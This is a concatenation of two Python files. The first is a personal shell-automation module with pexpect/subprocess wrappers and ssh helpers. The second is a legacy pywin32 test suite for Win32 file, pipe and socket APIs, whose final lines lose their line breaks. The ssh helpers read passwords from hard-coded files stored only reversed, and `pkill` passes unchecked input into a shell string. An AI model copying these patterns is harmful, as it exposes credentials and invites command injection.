        self.log_to_stdout(fun=fun, print_not_log=True)
        if driver is None:
            driver = lambda: self.all_output()
        from threading import Thread
        Thread(target=driver, args=driver_args, kwargs=d_kwargs).start()
        while self.alive():
            s = input_while(lambda: self.alive())
            if self.alive():
                try:
                    self.sendline(s)
                except IOError as e:
                    print(f"GOT {e} on sendline")

    # @log_invokation()
    def interact(self, force=False):
        """Real pexpect interact when stdout is a tty; otherwise just drain
        output (unless force=True)."""
        if sys.stdout.isatty():
            return self.p.interact()
        elif force:
            print('isatty() = false, but force=true. Here goes...')
            return self.p.interact()
        else:
            print('isatty() = false, so just getting output and returning none')
            self.all_output()
            return None

    def expect(self, *args):
        return self.p.expect(*args)

    def sendline(self, s):
        # print('sending line:' + s)
        if islist(s):
            s = ' '.join(s)
        rrr = self.p.sendline(s)
        # print('sent line')
        return rrr

    def alive(self):
        return self.p.isalive()

    @log_invokation(level=LogLevel.INFO)
    def detatch_monitor(self):
        # NOTE(review): sets the flag even if attatch_monitor was never called.
        self._detatch_monitor = True
        print(f"{self.__class__.__name__} Monitor detatched")

    @log_invokation(level=LogLevel.INFO)
    def attatch_monitor(self, period=5, logfile=None):
        """Start a daemonless thread that periodically dumps the pexpect state.

        BUG(review): the loop sleeps a hard-coded 5 seconds; the `period`
        parameter is accepted but never used.
        """
        from time import sleep
        self._detatch_monitor = False

        def monitor():
            log('in monitor thread')
            while not self._detatch_monitor:
                data = f"\n\n{self.__class__.__name__} Monitor\n{str(self.p)}\n\n"
                if logfile is None:
                    print(data)
                else:
                    from mlib.file import File
                    File(logfile).append(data)
                sleep(5)
            log('end of monitor thread')

        from threading import Thread
        Thread(target=monitor).start()

    @log_invokation(level=LogLevel.INFO)
    def log_to_stdout(
            self,
            fun=None,
            o=None,
            max_line_length=sys.maxsize,  # DEPRECATED, FROM OLD, NOW FIXED ISSUE
            min_pause=0,
            just_fun=False,
            print_not_log=False,
            stop_on=()
    ):
        """Install a pexpect logfile_read sink that mirrors child output.

        fun(data, o) is called with each decoded chunk; unless just_fun, the
        chunk is also buffered and emitted on flush via print() or log().
        Returns a Stopper whose stop() uninstalls the sink.
        """
        if self._logging_to_stdout:
            err("really wanna call this twice?")
        self._logging_to_stdout = True

        class MyBuffer:
            def __init__(self, funn, oo):
                self.output_buffer = bytearray()
                self.fun = funn
                self.o = oo
                self.last_print = 0
                self.stopped = False

            # @log_invokation
            def write(self, data: bytes):
                if self.stopped:
                    return
                assert not isstr(data)
                try:
                    data = data.decode('utf-8').replace('\r', '')
                except UnicodeDecodeError as u:
                    data = "!!![UnicodeDecodeError]!!!"
                # If any stop_on token matches, emit only the matching line,
                # then permanently mute this sink.
                for stop_on_s in stop_on:
                    if stop_on_s in data or data in stop_on_s:
                        last_lines = data.split('\n')
                        for last_line in last_lines:
                            if stop_on_s in last_line or last_line in stop_on_s:
                                break
                        if self.fun is not None:
                            self.fun(last_line, self.o)
                        print(last_line)
                        self.stopped = True
                        return
                if self.fun is not None:
                    self.fun(data, self.o)
                if not just_fun:
                    # self.output_buffer.extend(data.encode())
                    self.output_buffer.extend(data.encode())

            # @log_invokation
            def flush(self):
                if self.stopped:
                    return
                if not just_fun:
                    if print_not_log:
                        print(self.output_buffer.decode(), end='')
                    else:
                        log(self.output_buffer.decode())  # needs to go through log function for log table/pie chart to work
                    # sys.stdout.buffer.write(self.output_buffer)
                    self.output_buffer = bytearray()

        buf = MyBuffer(fun, o)
        self.p.logfile_read = buf
        self.p.logfile_send = None
        self_at_shell = self

        @dataclass
        class Stopper:
            # NOTE(review): field is named 'bug' (likely a typo for 'buf') and
            # is unused — stop() reaches buf through the closure instead.
            bug: MyBuffer

            def stop(self):
                buf.stopped = True
                self_at_shell._logging_to_stdout = False
                self_at_shell.p.logfile_read = None

        return Stopper(buf)

    def close(self):
        return self.p.close()


class SPShell(AbstractShell):
    """subprocess.Popen-backed shell; stderr is merged into stdout."""

    def __init__(self, *command, shell=False, silent=False):
        self.shell = shell
        super().__init__(*command, silent=silent)

    def _start(self):
        from subprocess import PIPE, Popen, STDOUT
        return Popen(self.command_as_list, stdin=PIPE, stdout=PIPE, stderr=STDOUT, shell=self.shell)

    def wait(self):
        return self.p.wait()

    def all_output(self):
        return '\n'.join(self.readlines())

    def readlines(self):
        # communicate() waits for process exit; only valid once per process.
        (stdout, _) = self.p.communicate()
        stdout = utf_decode(stdout)
        return stdout.split('\n')

    def readline(self):
        return utf_decode(self.p.stdout.readline())

    def readline_nonblocking(self, timeout=-1):
        """BUG(review): pairs a (thread-only) queue.Queue with a
        multiprocessing.Process — the child's queue.put happens in another
        process and is never visible here, so q.get will always time out."""
        from queue import Empty, Queue

        def enqueue_output(out, queue):
            queue.put(out.readline())

        q = Queue()
        from multiprocessing import Process
        t = Process(target=enqueue_output, args=(self.p.stdout, q), daemon=True)
        t.start()
        try:
            line = q.get(timeout=timeout)
        except Empty:
            t.terminate()
            return None
        else:
            return line

    def interact(self):
        raise NotImplementedError

    def expect(self, *args):
        raise NotImplementedError

    def sendline(self, s):
        # NOTE(review): Popen pipes are binary by default; writing a str here
        # presumably relies on callers passing bytes — confirm.
        self.p.stdin.write(s)

    def alive(self):
        return self.p.poll() is None

    def close(self):
        self.p.kill()  # same as terminate

    def lambda_and_raise_if_err(self, l=None):
        """Apply l to every output line (default: log them), then raise if the
        process exited non-zero."""
        if l is None:
            l = lambda lin: log(f'{self}: {lin}')
        lines = self.readlines()
        for line in lines:
            l(line)
        if self.p.returncode != 0:
            raise Exception(f'return code not 0: {self.p.returncode}')

    def readlines_and_raise_if_err(self):
        lines = self.readlines()
        if self.p.returncode != 0:
            raise Exception(f'return code not 0: {self.p.returncode}')
        return arr(lines)


spshell = SPShell


def export(thing, *names):
    """Bind `thing` under additional names in its own module."""
    import inspect
    for name in names:
        setattr(inspect.getmodule(thing), name, thing)
    return thing


class SSHExpectProcess(ExpectShell):
    """ExpectShell specialized for ssh/scp sessions with prompt handling."""

    # used to match the command-line prompt
    SUB_PROMPT = 'PEXPECT'
    UNIQUE_PROMPT = r"\[" + SUB_PROMPT + r"\][\$\#] "
    PROMPT = UNIQUE_PROMPT

    # used to set shell command-line prompt to UNIQUE_PROMPT.
    PROMPT_SET_SH = r"PS1='[" + SUB_PROMPT + r"]\$ '"

    def return_from_line(self, line):
        """Run `line` at the remote prompt and return its output, with the
        prompt markers and the echoed command filtered out."""
        self.prompt()
        s = ""

        def build_str(ss, o):
            nonlocal s
            s += ss

        mystopper = self.log_to_stdout(
            fun=build_str,
            o=None,
            just_fun=True,
        )
        self.sendline(line)
        self.prompt()
        mystopper.stop()
        self.sendline("echo dummyechosowecansendatpromt")

        def sfilt(sss):
            return self.SUB_PROMPT not in sss and sss.strip() != line

        s = '\n'.join([ss for ss in s.split('\n') if sfilt(ss)])
        return s

    def login(self, longpass=False):
        """Answer the ssh passphrase/password prompt from a local secrets file."""
        # print('waiting for passphrase prompt')
        self.p.expect(['passphrase', 'password'])
        # print('got passphrase prompt')
        if longpass:
            self.sendlongpass()
        else:
            self.sendpass()
        # print('sent password')

    def sendpass(self):
        # Secret stored reversed on disk; path is hard-coded to this machine.
        warn('huge security risk 1')
        with open('/Users/matt/.pass', 'r') as f:
            self.p.sendline(f.read()[::-1])

    def sendlongpass(self):
        warn('huge security risk 2')
        with open('/Users/matt/.passlong', 'r') as f:
            s = f.read()[::-1]
            self.p.sendline(s)

    def prompt(self):
        # print('waiting for prompt')
        self.p.expect(self.PROMPT)
        # print('at prompt')

    def sendatprompt(self, line):
        self.prompt()
        self.sendline(line)

    def setprompt(self):
        self.p.sendline(self.PROMPT_SET_SH)
        # print('set prompt')


def ssh(*command, **kwargs):
    return SSHExpectProcess(['/usr/bin/ssh'] + AbstractShell.command_list(*command), **kwargs)


def scp(*command, **kwargs):
    return SSHExpectProcess(['/usr/bin/scp'] + AbstractShell.command_list(*command), **kwargs)


class InteractiveExpectShell(ExpectShell):
    """ExpectShell (default: bash) where unknown attributes become commands:
    sh.ls('-la') sends the line 'ls -la'."""

    def __init__(self, *command, **kwargs):
        if isempty(command):
            command = ['bash']
        super().__init__(*command, **kwargs)

    def __getattr__(self, item):
        def f(*args):
            # problem = shell.command_str(*args)
            # print(f'{problem=}')
            return self.sendline(f'{item} {shell.command_str(*args)}'.strip())

        return f


shell = ExpectShell


def eshell(*args, **kwargs):
    return shell(*args, **kwargs).interact()


ishell = InteractiveExpectShell


@log_invokation
def pkill(name):
    shell(f'pkill -f {name}').interact()


# same as eshell but SAFE from weird effects on terminal (no interact, but still blocks)
def safeshell(*args, **kwargs):
    sh = shell(*args, **kwargs)
    sh.all_output()


def arg_str(o):
    # Booleans become '1'/'0' for command-line passing.
    if isinstance(o, bool):
        return '1' if o else '0'
    else:
        return str(o)


def pyshell(
        script,
        args=(),
        cd=None,
        env=None,
        PYTHONPATH=None,
        force=False
):
    """Run a script with a specific conda env's python via fake_interact.

    NOTE(review): `force` is accepted but unused; interpreter path is
    hard-coded to this machine.
    """
    pyenv = None
    if PYTHONPATH is not None:
        pyenv = {'PYTHONPATH': PYTHONPATH}
    from mlib.file import File
    return shell(
        f'/Users/matt/miniconda3/envs/{env}/bin/python3',
        File(script).abspath,
        *args,
        cwd=cd,
        env=pyenv
    ).fake_interact()


@dataclass
class AddInputEr:
    """Worker run in a child process: reads stdin one char at a time (gated by
    readsem so the parent controls pacing) and pushes chars onto a queue."""
    keep_going: bool
    readsem: object  # multiprocessing.Semaphore

    def __call__(self, my_input_queue):
        stdin = open(0)  # I'm stunned... it worked
        print('start of add_input thread')
        while self.keep_going:
            if not self.readsem.acquire(block=True, timeout=0.1):
                continue
            c = stdin.read(1)
            print(f"GOT1:{c}")
            my_input_queue.put(c)
        print('end of add_input thread')


# @log_invokation
def input_while(check):
    """Collect one line of stdin input, but bail out early if check() becomes
    False. Returns whatever was typed so far (possibly '')."""
    import multiprocessing
    from time import sleep, time
    # with open(sys.stdin) as f:
    #     f.read()  # clear it?
    # print('clearing stdin')
    # sys.stdin.read()  # clear it?
    # print('done clearing stdin')
    addInputErr = AddInputEr(
        keep_going=True,
        readsem=multiprocessing.Semaphore()
    )
    input_queue = multiprocessing.Queue()
    from multiprocessing import Process
    input_thread = Process(target=addInputErr, args=(input_queue,))
    input_thread.daemon = True
    input_thread.start()
    last_update = time()
    result = ""
    PERIOD = 0.3
    # print('start loop with check')
    recent_input_until = False
    # first = True
    while addInputErr.keep_going:
        if not input_queue.empty():
            c = input_queue.get()
            if c == "\n":
                # BUG(review): this rebinds the local name (and creates a
                # stray 'keep_going' local) instead of setting the attribute;
                # harmless only because of the immediate break.
                addInputErr = keep_going = False  # it wont see this?
                break
            else:
                # if first:
                #     log('debug char')
                #     first = False
                result += c
                recent_input_until = time() + 1
                addInputErr.readsem.release()  # it better see this...
        elif recent_input_until:
            # purpose: prevent sleeping from making input realllly slow
            if time() > recent_input_until:
                recent_input_until = False
        else:
            if not check():
                # purpose: break out of this function if test fails ("while" condition)
                # NOTE(review): the child process has its own copy of
                # addInputErr, so it never observes this flag — hence the
                # terminate() below.
                addInputErr.keep_going = False  # it wont see this?
                break
            sleep(
                PERIOD)  # purpose: without this, my computer exploded from high CPU usage (even if we did time.time()-last_update > PERIOD )
    # print(f'returning result:{result}')
    # input_thread._stop()  # im desperate
    input_thread.terminate()  # since it might not see "keep_going".... this better work
    # log('debug out')
    return result
test_win32file.py
"""pywin32 win32file test suite (legacy, Python-2-era).

Exercises raw Win32 file/pipe/socket APIs: buffers, simple file ops,
overlapped I/O, completion ports, AcceptEx/WSARecv, and FindFiles.
Windows-only. Uses deprecated unittest aliases (failUnless/failIf/
assertEquals) throughout — kept as-is for fidelity with the era.
"""
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
try:
    import win32timezone
except SyntaxError:
    # win32timezone uses decorators and isn't compatible with py2.3
    assert sys.version_info < (2, 4)
try:
    set
except NameError:
    from sets import Set as set


class TestReadBuffer(unittest.TestCase):
    """AllocateReadBuffer: length, item access, slice assignment."""

    def testLen(self):
        buffer = win32file.AllocateReadBuffer(1)
        self.failUnlessEqual(len(buffer), 1)

    def testSimpleIndex(self):
        val = str2bytes('\xFF')
        buffer = win32file.AllocateReadBuffer(1)
        buffer[0] = val
        self.failUnlessEqual(buffer[0], val)

    def testSimpleSlice(self):
        buffer = win32file.AllocateReadBuffer(2)
        val = str2bytes('\0\0')
        buffer[:2] = val
        self.failUnlessEqual(buffer[0:2], val)


class TestSimpleOps(unittest.TestCase):
    """Synchronous CreateFile/ReadFile/WriteFile and file-time round-trips."""

    def testSimpleFiles(self):
        try:
            fd, filename = tempfile.mkstemp()
        except AttributeError:
            self.fail("This test requires Python 2.3 or later")
        os.close(fd)
        os.unlink(filename)
        handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
        test_data = str2bytes("Hello\0there")
        try:
            win32file.WriteFile(handle, test_data)
            handle.Close()
            # Try and open for read
            handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
            rc, data = win32file.ReadFile(handle, 1024)
            self.assertEquals(data, test_data)
        finally:
            handle.Close()
            try:
                os.unlink(filename)
            except os.error:
                pass

    # A simple test using normal read/write operations.
    def testMoreFiles(self):
        # Create a file in the %TEMP% directory.
        testName = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
        desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
        # Set a flag to delete the file automatically when it is closed.
        fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
        h = win32file.CreateFile(testName, desiredAccess, win32file.FILE_SHARE_READ,
                                 None, win32file.CREATE_ALWAYS, fileFlags, 0)
        # Write a known number of bytes to the file.
        data = str2bytes("z") * 1025
        win32file.WriteFile(h, data)
        self.failUnless(win32file.GetFileSize(h) == len(data),
                        "WARNING: Written file does not have the same size as the length of the data in it!")
        # Ensure we can read the data back.
        win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
        hr, read_data = win32file.ReadFile(h, len(data) + 10)  # + 10 to get anything extra
        self.failUnless(hr == 0, "Readfile returned %d" % hr)
        self.failUnless(read_data == data, "Read data is not what we wrote!")
        # Now truncate the file at 1/2 its existing size.
        newSize = len(data) // 2
        win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
        win32file.SetEndOfFile(h)
        self.failUnlessEqual(win32file.GetFileSize(h), newSize)
        # GetFileAttributesEx/GetFileAttributesExW tests.
        self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
        attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
        self.failUnless(size == newSize,
                        "Expected GetFileAttributesEx to return the same size as GetFileSize()")
        self.failUnless(attr == win32file.GetFileAttributes(testName),
                        "Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
        h = None  # Close the file by removing the last reference to the handle!
        self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")

    def testFilePointer(self):
        # via [ 979270 ] SetFilePointer fails with negative offset
        # Create a file in the %TEMP% directory.
        filename = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
        f = win32file.CreateFile(filename, win32file.GENERIC_READ | win32file.GENERIC_WRITE, 0, None,
                                 win32file.CREATE_ALWAYS, win32file.FILE_ATTRIBUTE_NORMAL, 0)
        try:
            # Write some data
            data = str2bytes('Some data')
            (res, written) = win32file.WriteFile(f, data)
            self.failIf(res)
            self.assertEqual(written, len(data))
            # Move at the beginning and read the data
            win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
            (res, s) = win32file.ReadFile(f, len(data))
            self.failIf(res)
            self.assertEqual(s, data)
            # Move at the end and read the data
            win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
            (res, s) = win32file.ReadFile(f, len(data))
            self.failIf(res)
            self.failUnlessEqual(s, data)
        finally:
            f.Close()
            os.unlink(filename)

    def testFileTimesTimezones(self):
        if not issubclass(pywintypes.TimeType, datetime.datetime):
            # maybe should report 'skipped', but that's not quite right as
            # there is nothing you can do to avoid it being skipped!
            return
        filename = tempfile.mktemp("-testFileTimes")
        now_utc = win32timezone.utcnow()
        now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
        h = win32file.CreateFile(filename, win32file.GENERIC_READ | win32file.GENERIC_WRITE,
                                 0, None, win32file.CREATE_ALWAYS, 0, 0)
        try:
            # Times set as UTC must compare equal to their local equivalents...
            win32file.SetFileTime(h, now_utc, now_utc, now_utc)
            ct, at, wt = win32file.GetFileTime(h)
            self.failUnlessEqual(now_local, ct)
            self.failUnlessEqual(now_local, at)
            self.failUnlessEqual(now_local, wt)
            # and the reverse - set local, check against utc
            win32file.SetFileTime(h, now_local, now_local, now_local)
            ct, at, wt = win32file.GetFileTime(h)
            self.failUnlessEqual(now_utc, ct)
            self.failUnlessEqual(now_utc, at)
            self.failUnlessEqual(now_utc, wt)
        finally:
            h.close()
            os.unlink(filename)

    def testFileTimes(self):
        # Two code paths: datetime-based PyTime (modern) vs the legacy
        # integer PyTime, which needs a manual timezone-bias correction.
        if issubclass(pywintypes.TimeType, datetime.datetime):
            from win32timezone import TimeZoneInfo
            now = datetime.datetime.now(tz=TimeZoneInfo.local())
            nowish = now + datetime.timedelta(seconds=1)
            later = now + datetime.timedelta(seconds=120)
        else:
            rc, tzi = win32api.GetTimeZoneInformation()
            bias = tzi[0]
            if rc == 2:  # daylight-savings is in effect.
                bias += tzi[-1]
            bias *= 60  # minutes to seconds...
            tick = int(time.time())
            now = pywintypes.Time(tick + bias)
            nowish = pywintypes.Time(tick + bias + 1)
            later = pywintypes.Time(tick + bias + 120)
        filename = tempfile.mktemp("-testFileTimes")
        # Windows docs the 'last time' isn't valid until the last write
        # handle is closed - so create the file, then re-open it to check.
        open(filename, "w").close()
        f = win32file.CreateFile(filename, win32file.GENERIC_READ | win32file.GENERIC_WRITE,
                                 0, None, win32con.OPEN_EXISTING, 0, None)
        try:
            ct, at, wt = win32file.GetFileTime(f)
            self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
            self.failUnless(now <= ct <= nowish, (now, ct))
            self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now, wt))
            self.failUnless(now <= wt <= nowish, (now, wt))
            # Now set the times.
            win32file.SetFileTime(f, later, later, later)
            # Get them back.
            ct, at, wt = win32file.GetFileTime(f)
            # XXX - the builtin PyTime type appears to be out by a dst offset.
            # just ignore that type here...
            if issubclass(pywintypes.TimeType, datetime.datetime):
                self.failUnlessEqual(ct, later)
                self.failUnlessEqual(at, later)
                self.failUnlessEqual(wt, later)
        finally:
            f.Close()
            os.unlink(filename)


class TestOverlapped(unittest.TestCase):
    """Overlapped I/O, IO completion ports, and OVERLAPPED object semantics."""

    def testSimpleOverlapped(self):
        # Create a file in the %TEMP% directory.
        import win32event
        testName = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
        desiredAccess = win32file.GENERIC_WRITE
        overlapped = pywintypes.OVERLAPPED()
        evt = win32event.CreateEvent(None, 0, 0, None)
        overlapped.hEvent = evt
        # Create the file and write shit-loads of data to it.
        h = win32file.CreateFile(testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
        chunk_data = str2bytes("z") * 0x8000
        num_loops = 512
        expected_size = num_loops * len(chunk_data)
        for i in range(num_loops):
            win32file.WriteFile(h, chunk_data, overlapped)
            win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
            overlapped.Offset = overlapped.Offset + len(chunk_data)
        h.Close()
        # Now read the data back overlapped
        overlapped = pywintypes.OVERLAPPED()
        evt = win32event.CreateEvent(None, 0, 0, None)
        overlapped.hEvent = evt
        desiredAccess = win32file.GENERIC_READ
        h = win32file.CreateFile(testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
        buffer = win32file.AllocateReadBuffer(0xFFFF)
        while 1:
            try:
                hr, data = win32file.ReadFile(h, buffer, overlapped)
                win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
                overlapped.Offset = overlapped.Offset + len(data)
                if not data is buffer:
                    self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
            except win32api.error:
                # EOF (or any error) terminates the read loop.
                break
        h.Close()

    def testCompletionPortsMultiple(self):
        # Mainly checking that we can "associate" an existing handle.  This
        # failed in build 203.
        ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE, 0, 0, 0)
        socks = []
        for PORT in range(9123, 9125):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock.bind(('', PORT))
            sock.listen(1)
            socks.append(sock)
            new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
            assert new is ioport
        for s in socks:
            s.close()
        hv = int(ioport)
        ioport = new = None
        # The handle itself should be closed now (unless we leak references!)
        # Check that.
        try:
            win32file.CloseHandle(hv)
            raise RuntimeError("Expected close to fail!")
        except win32file.error as details:
            self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)

    def testCompletionPortsQueued(self):
        class Foo:
            pass
        io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
        overlapped = pywintypes.OVERLAPPED()
        overlapped.object = Foo()
        win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
        errCode, bytes, key, overlapped = \
            win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
        self.failUnlessEqual(errCode, 0)
        self.failUnless(isinstance(overlapped.object, Foo))

    def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
        # Server side of the named-pipe completion-port tests (runs on a thread).
        overlapped = pywintypes.OVERLAPPED()
        win32pipe.ConnectNamedPipe(handle, overlapped)
        if drop_overlapped_reference:
            # Be naughty - the overlapped object is now dead, but
            # GetQueuedCompletionStatus will still find it.  Our check of
            # reference counting should catch that error.
            overlapped = None
            # even if we fail, be sure to close the handle; prevents hangs
            # on Vista 64...
            try:
                self.failUnlessRaises(RuntimeError,
                                      win32file.GetQueuedCompletionStatus, port, -1)
            finally:
                handle.Close()
            return
        result = win32file.GetQueuedCompletionStatus(port, -1)
        ol2 = result[-1]
        self.failUnless(ol2 is overlapped)
        data = win32file.ReadFile(handle, 512)[1]
        win32file.WriteFile(handle, data)

    def testCompletionPortsNonQueued(self, test_overlapped_death=0):
        # In 204 we had a reference count bug when OVERLAPPED objects were
        # associated with a completion port other than via
        # PostQueuedCompletionStatus.  This test is based on the reproduction
        # reported with that bug.
        # Create the pipe.
        BUFSIZE = 512
        pipe_name = r"\\.\pipe\pywin32_test_pipe"
        handle = win32pipe.CreateNamedPipe(pipe_name,
                                           win32pipe.PIPE_ACCESS_DUPLEX | win32file.FILE_FLAG_OVERLAPPED,
                                           win32pipe.PIPE_TYPE_MESSAGE |
                                           win32pipe.PIPE_READMODE_MESSAGE |
                                           win32pipe.PIPE_WAIT,
                                           1, BUFSIZE, BUFSIZE,
                                           win32pipe.NMPWAIT_WAIT_FOREVER,
                                           None)
        # Create an IOCP and associate it with the handle.
        port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
        win32file.CreateIoCompletionPort(handle, port, 1, 0)
        t = threading.Thread(target=self._IOCPServerThread, args=(handle, port, test_overlapped_death))
        t.setDaemon(True)  # avoid hanging entire test suite on failure.
        t.start()
        try:
            time.sleep(0.1)  # let thread do its thing.
            try:
                win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
            except win32pipe.error:
                # Testing for overlapped death causes this
                if not test_overlapped_death:
                    raise
        finally:
            if not test_overlapped_death:
                handle.Close()
            t.join(3)
            self.failIf(t.isAlive(), "thread didn't finish")

    def testCompletionPortsNonQueuedBadReference(self):
        self.testCompletionPortsNonQueued(True)

    def testHashable(self):
        overlapped = pywintypes.OVERLAPPED()
        d = {}
        d[overlapped] = "hello"
        self.failUnlessEqual(d[overlapped], "hello")

    def testComparable(self):
        overlapped = pywintypes.OVERLAPPED()
        self.failUnlessEqual(overlapped, overlapped)
        # ensure we explicitly test the operators.
        self.failUnless(overlapped == overlapped)
        self.failIf(overlapped != overlapped)

    def testComparable2(self):
        # 2 overlapped objects compare equal if their contents are the same.
        overlapped1 = pywintypes.OVERLAPPED()
        overlapped2 = pywintypes.OVERLAPPED()
        self.failUnlessEqual(overlapped1, overlapped2)
        # ensure we explicitly test the operators.
        self.failUnless(overlapped1 == overlapped2)
        self.failIf(overlapped1 != overlapped2)
        # now change something in one of them - should no longer be equal.
        overlapped1.hEvent = 1
        self.failIfEqual(overlapped1, overlapped2)
        # ensure we explicitly test the operators.
        self.failIf(overlapped1 == overlapped2)
        self.failUnless(overlapped1 != overlapped2)


class TestSocketExtensions(unittest.TestCase):
    """AcceptEx / WSASend / WSARecv winsock extensions."""

    def acceptWorker(self, port, running_event, stopped_event):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(('', port))
        listener.listen(200)
        # create accept socket
        accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # An overlapped
        overlapped = pywintypes.OVERLAPPED()
        overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
        # accept the connection.
        # We used to allow strings etc to be passed here, and they would be
        # modified!  Obviously this is evil :)
        buffer = " " * 1024  # EVIL - SHOULD NOT BE ALLOWED.
        self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
        # This is the correct way to allocate the buffer...
        buffer = win32file.AllocateReadBuffer(1024)
        rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
        self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
        # Set the event to say we are all ready
        running_event.set()
        # and wait for the connection.
        rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
        if rc == win32event.WAIT_TIMEOUT:
            self.fail("timed out waiting for a connection")
        nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
        # fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
        # Echo received bytes back to the client.
        accepter.send(buffer[:nbytes])
        # NOT set in a finally - this means *successfully* stopped!
        stopped_event.set()

    def testAcceptEx(self):
        port = 4680
        running = threading.Event()
        stopped = threading.Event()
        t = threading.Thread(target=self.acceptWorker, args=(port, running, stopped))
        t.start()
        running.wait(2)
        if not running.isSet():
            self.fail("AcceptEx Worker thread failed to start")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('127.0.0.1', port))
        win32file.WSASend(s, str2bytes("hello"), None)
        overlapped = pywintypes.OVERLAPPED()
        overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
        # Like above - WSARecv used to allow strings as the receive buffer!!
        buffer = " " * 10
        self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
        # This one should work :)
        buffer = win32file.AllocateReadBuffer(10)
        win32file.WSARecv(s, buffer, overlapped)
        nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
        got = buffer[:nbytes]
        self.failUnlessEqual(got, str2bytes("hello"))
        # thread should have stopped
        stopped.wait(2)
        if not stopped.isSet():
            self.fail("AcceptEx Worker thread failed to successfully stop")


class TestFindFiles(unittest.TestCase):
    """FindFilesW / FindFilesIterator behaviors."""

    def testIter(self):
        dir = os.path.join(os.getcwd(), "*")
        files = win32file.FindFilesW(dir)
        set1 = set()
        set1.update(files)
        set2 = set()
        for file in win32file.FindFilesIterator(dir):
            set2.add(file)
        assert len(set2) > 5, "This directory has less than 5 files!?"
        self.failUnlessEqual(set1, set2)

    def testBadDir(self):
        dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
        self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)

    def testEmptySpec(self):
        spec = os.path.join(os.getcwd(), "*.foo_bar")
        num = 0
        for i in win32file.FindFilesIterator(spec):
            num += 1
        self.failUnlessEqual(0, num)

    def testEmptyDir(self):
        test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
        try:
            # Note: previously used shutil.rmtree, but when looking for
            # reference count leaks, that function showed leaks!  os.rmdir
            # doesn't have that problem.
os.rmdir(test_path) except os.error: pass os.mkdir(test_path) try: num = 0 for i in win32file.FindFilesIterator(os.path.join(test_path, "*")): num += 1 # Expecting "." and ".." only self.failUnlessEqual(2, num) finally: os.rmdir(test_path) class TestDirectoryChanges(unittest.TestCase): num_test_dirs = 1 def setUp(self): self.watcher_threads = [] self.watcher_thread_changes = [] self.dir_names = [] self.dir_handles = [] for i in range(self.num_test_dirs): td = tempfile.mktemp("-test-directory-changes-%d" % i) os.mkdir(td) self.dir_names.append(td) hdir = win32file.CreateFile(td, ntsecuritycon.FILE_LIST_DIRECTORY, win32con.FILE_SHARE_READ, None, # security desc win32con.OPEN_EXISTING, win32con.FILE_FLAG_BACKUP_SEMANTICS | win32con.FILE_FLAG_OVERLAPPED, None) self.dir_handles.append(hdir) changes = [] t = threading.Thread(target=self._watcherThreadOverlapped, args=(td, hdir, changes)) t.start() self.watcher_threads.append(t) self.watcher_thread_changes.append(changes) def _watcherThread(self, dn, dh, changes): # A synchronous version: # XXX - not used - I was having a whole lot of problems trying to # get this to work. Specifically: # * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely. # * If another thread attempts to close the handle while # ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method # blocks (which has nothing to do with the GIL - it is correctly # managed) # Which ends up with no way to kill the thread! 
